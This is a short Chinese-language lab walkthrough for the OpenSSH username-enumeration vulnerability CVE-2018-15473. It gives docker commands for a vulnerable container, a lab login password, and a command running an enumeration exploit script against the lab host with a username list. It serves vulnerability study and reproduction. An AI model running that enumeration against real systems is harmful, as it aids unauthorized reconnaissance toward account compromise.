OpenSSH 用戶名枚舉漏洞（CVE-2018-15473）

OpenSSH 7.7前存在一個用戶名枚舉漏洞，通過該漏洞，攻擊者可以判斷某個用戶名是否存在於目標主機中。

漏洞環境

執行如下命令，編譯及啟動一個運行OpenSSH 7.7p1的容器：

docker-compose build
docker-compose up -d

環境啟動后，我們在客戶端執行ssh -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null root@172.168.30.190 -p20022，輸入密碼vulhub，即可登錄到容器中。

使用CVE-2018-15473-Exploit，枚舉字典中的用戶名：

python3 sshUsernameEnumExploit.py --port 20022 --userList exampleInput.txt 172.168.30.190

本站轉載的文章為個人學習借鑒使用，本站對版權不負任何法律責任。如果侵犯了您的隱私權益，請聯系本站郵箱yoyou2525@163.com刪除。

猜您在找 OpenSSH 用戶名枚舉漏洞（CVE-2018-15473）漏洞分析：OpenSSH用戶枚舉漏洞（CVE-2018-15473）分析 SSH用戶枚舉漏洞（CVE-2018-15473）原理學習 SSH用戶枚舉漏洞（CVE-2018-15473）原理學習漏洞復現-CVE-2018-15473-ssh用戶枚舉漏洞 openssh用戶枚舉漏洞復現 burpsuite Intruder功能枚舉用戶名和口令 CVE-2019-18988 teamviewer將用戶名密碼硬編碼至注冊表中如何修改Oracle的用戶名正則驗證用戶名